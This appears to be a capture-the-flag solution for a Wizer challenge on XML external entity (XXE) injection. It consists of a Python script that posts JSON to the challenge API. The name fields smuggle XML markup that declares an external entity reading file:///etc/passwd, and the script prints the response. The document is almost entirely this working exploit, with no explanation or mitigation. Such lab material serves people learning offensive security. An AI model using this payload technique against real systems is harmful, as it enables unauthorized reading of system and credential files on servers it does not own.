Wizer - Challenge 9 - XXE

Exploit

import requests

url = "https://chal9.vercel.app/api/createCard/"

r = requests.post(
    url,
    json={
        "firstName": "pelele\"><<!!--",
        "lastName": "pelele--><<!!ENTITY lastName SYSTEM \"file:///etc/passwd",
        "role": "pelele"
    },
)


print(r.text)